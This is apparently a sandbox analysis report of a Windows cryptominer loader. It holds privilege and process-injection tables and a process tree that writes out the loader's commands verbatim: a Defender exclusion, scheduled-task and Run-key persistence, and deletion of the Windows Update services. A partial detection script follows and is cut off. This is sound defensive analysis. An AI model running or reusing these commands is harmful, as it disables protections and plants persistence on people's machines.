Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Privileges shown only as numbers are ones the sandbox did not resolve from their LUID: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege. Each elevated powershell.exe run enabled the whole set from SeIncreaseQuotaPrivilege through 36, i.e. every privilege in an administrator token rather than the one it needed, whereas the sample, the SysWOW64 PowerShell and MSBuild.exe took only SeDebugPrivilege (what process injection needs) and powercfg.exe only SeShutdownPrivilege and SeCreatePagefilePrivilege. This table, like the HKEY_USERS, EnumeratesProcesses and WriteProcessMemory tables, stops at 64 rows, so each is a prefix of the recorded events, not the full list.

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2268 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4736 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
PID 2204 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4824 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2204 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2680 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 940 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 3816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 3816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 4128 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 4572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 4572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2680 wrote to memory of 3488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2680 wrote to memory of 3488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2688 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2688 wrote to memory of 744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 416 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 416 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2300 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2300 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 3724 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\choice.exe
PID 3724 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\choice.exe
PID 1504 wrote to memory of 4032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1504 wrote to memory of 4032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2640 wrote to memory of 5056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2640 wrote to memory of 5056 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 592 wrote to memory of 3572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 592 wrote to memory of 3572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2640 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2640 wrote to memory of 3492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 592 wrote to memory of 2928 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe

"C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig/release

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /release

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

"C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ipconfig/renew

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /renew

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qzignfste#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsHost" } Else { "C:\Program Files\Windows\WindowsHost" }

C:\Windows\System32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn WindowsHost

C:\Program Files\Windows\WindowsHost

"C:\Program Files\Windows\WindowsHost"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe yadsrbyzjoct

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe hfskhxmdoncbxhsb 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
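
The process list above spells out the loader's whole evasion and persistence chain as separate command lines: a PowerShell -ENC stub (the base64 is UTF-16LE for `start-sleep -seconds 10`), a Defender exclusion over the user profile and Program Files, an admin/non-admin branch that installs either a SYSTEM scheduled task or an HKCU Run key named WindowsHost, powercfg calls that stop the host from sleeping, sc stop plus reg delete against the Windows Update and BITS services, and a choice-based delayed delete of the dropper. The Python below is an added triage example, not sandbox output: it runs detection logic of that shape over process-creation command lines (Sysmon Event ID 1 or Security 4688 records would be the usual source), decodes the -ENC payload and reports the persistence names, excluded paths and killed services. The sample command lines are copied from this report; the regexes, category names and the SAMPLE_CMDLINES list are this example's own.

```python
"""Added triage helper for the process tree above (example code, not
sandbox output). Decodes PowerShell -ENC payloads and flags the loader's
update-service kill, Defender exclusion, scheduled-task / Run-key
persistence, powercfg tampering and delayed self-delete in command lines."""
import base64
import re
from typing import Dict, List, Optional

# Services the loader stops and deletes so Windows Update cannot evict the
# miner; names taken from the sc / reg command lines in this report.
UPDATE_SERVICES = {"UsoSvc", "WaaSMedicSvc", "wuauserv", "bits", "dosvc"}
_UPDATE_LOWER = {s.lower() for s in UPDATE_SERVICES}

# Patterns are this example's own; they match the command lines shown above.
_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_SC_STOP_RE = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)
_REG_DEL_SVC_RE = re.compile(
    r'reg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\([^"\s\\]+)', re.I)
_EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+(.+?)(?:\s+-\w+|\s*$)", re.I)
_TASK_CREATE_RE = re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I)
_TASK_NAME_RE = re.compile(r"""(?:-TaskName|/tn)\s+['"]?([^'"\s]+)""", re.I)
_RUN_KEY_RE = re.compile(
    r'reg\s+add\s+"?HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"?\s+/v\s+"?([^"\s]+)', re.I)
_POWERCFG_RE = re.compile(r"powercfg\s+/x\s+-(\S+-timeout-(?:ac|dc))\s+0\b", re.I)
_SELF_DELETE_RE = re.compile(r'choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\s+"?([^"]+?)"?\s*$', re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
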